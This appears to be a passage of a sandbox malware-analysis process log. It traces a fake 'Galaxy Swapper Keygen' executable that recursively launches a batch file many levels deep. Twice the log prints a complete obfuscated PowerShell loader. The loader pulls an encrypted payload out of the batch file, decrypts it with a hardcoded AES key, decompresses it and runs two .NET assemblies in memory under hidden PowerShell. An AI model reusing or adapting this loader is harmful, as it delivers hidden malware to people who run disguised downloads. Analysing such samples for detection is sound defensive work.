"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
127⤵
PID:8240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
128⤵
PID:8320

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
128⤵
PID:8360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
129⤵
PID:8432

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
129⤵
PID:8464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
130⤵
PID:8544

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
130⤵
PID:8580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
131⤵
PID:8700

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
131⤵
PID:8740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
132⤵
PID:8856

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
132⤵
PID:8864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
133⤵
PID:9008

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
133⤵
PID:9052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
134⤵
PID:8200

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
134⤵
PID:6096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
135⤵
PID:8592

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
135⤵
PID:8760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
136⤵
PID:4512

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
136⤵
PID:8536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
137⤵
PID:9152

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
137⤵
PID:8036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
138⤵
PID:8728

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
138⤵
PID:8508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
139⤵
PID:8784

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
139⤵
PID:7272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
140⤵
PID:8796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
141⤵
PID:10768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
141⤵
- Command and Scripting Interpreter: PowerShell
PID:8868

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
140⤵
PID:8800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
141⤵
PID:7440

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
141⤵
PID:4328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
142⤵
PID:8792

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
142⤵
PID:5216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
143⤵
PID:1560

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
143⤵
PID:9264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
144⤵
PID:9388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
145⤵
PID:11788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
145⤵
- Command and Scripting Interpreter: PowerShell
PID:5320

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
144⤵
PID:9416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
145⤵
PID:9556

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
145⤵
PID:9620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
146⤵
PID:9796

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
146⤵
PID:9824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
147⤵
PID:9992

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
147⤵
PID:10056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
148⤵
PID:10224

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
148⤵
PID:7260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
149⤵
PID:9440

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
149⤵
PID:432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
150⤵
PID:8624

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
150⤵
PID:8864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
151⤵
PID:2316

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
151⤵
PID:3748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
152⤵
PID:9912

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
152⤵
PID:10108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
153⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
153⤵
PID:5596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
154⤵
PID:3352

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
154⤵
PID:2112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
155⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
155⤵
PID:7364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
156⤵
PID:432

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
156⤵
PID:7448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
157⤵
PID:6088

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
157⤵
PID:9760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
158⤵
PID:4180

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
158⤵
PID:5124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
159⤵
PID:9888

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
159⤵
PID:7772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
160⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
160⤵
PID:4868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
161⤵
PID:9844

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
161⤵
PID:5400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
162⤵
PID:3996

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
162⤵
PID:4224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
163⤵
PID:10092

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
163⤵
PID:9336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
164⤵
PID:8952

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
164⤵
PID:4056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
165⤵
PID:9364

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
165⤵
PID:5784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
166⤵
PID:644

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
166⤵
PID:8036

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
167⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
167⤵
PID:8348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
168⤵
PID:5152

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
168⤵
PID:8852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
169⤵
PID:4996

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
169⤵
PID:9308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
170⤵
PID:10160

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
170⤵
PID:2732

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
171⤵
PID:7372

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
171⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
172⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
172⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
173⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
173⤵
PID:4848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
174⤵
PID:10000

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
174⤵
PID:7104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
175⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
175⤵
PID:5236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
176⤵
PID:9940

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
176⤵
PID:396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
177⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
177⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
178⤵
PID:9316

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
178⤵
PID:1856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
179⤵
PID:9460

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
179⤵
PID:5908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
180⤵
PID:240

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
180⤵
PID:7112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
181⤵
PID:6360

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
181⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
182⤵
PID:9784

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
182⤵
PID:9264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
183⤵
PID:8012

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
183⤵
PID:6320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
184⤵
PID:1496

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
184⤵
PID:6952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
185⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
185⤵
PID:4584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
186⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
186⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
187⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
187⤵
PID:1464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
188⤵
PID:4632

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
188⤵
PID:10204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
189⤵
PID:1032

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
189⤵
PID:7200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
190⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
190⤵
PID:4720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
191⤵
PID:7404

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
191⤵
PID:3700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
192⤵
PID:6992

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
192⤵
PID:7260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
193⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
193⤵
PID:9624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
194⤵
PID:4224

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
194⤵
PID:4980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
195⤵
PID:6608

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
195⤵
PID:8280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
196⤵
PID:10436

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
196⤵
PID:10464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
197⤵
PID:10700

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
197⤵
PID:10748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
198⤵
PID:10944

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
198⤵
PID:10976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
199⤵
PID:11152

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
199⤵
PID:11204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
200⤵
PID:7516

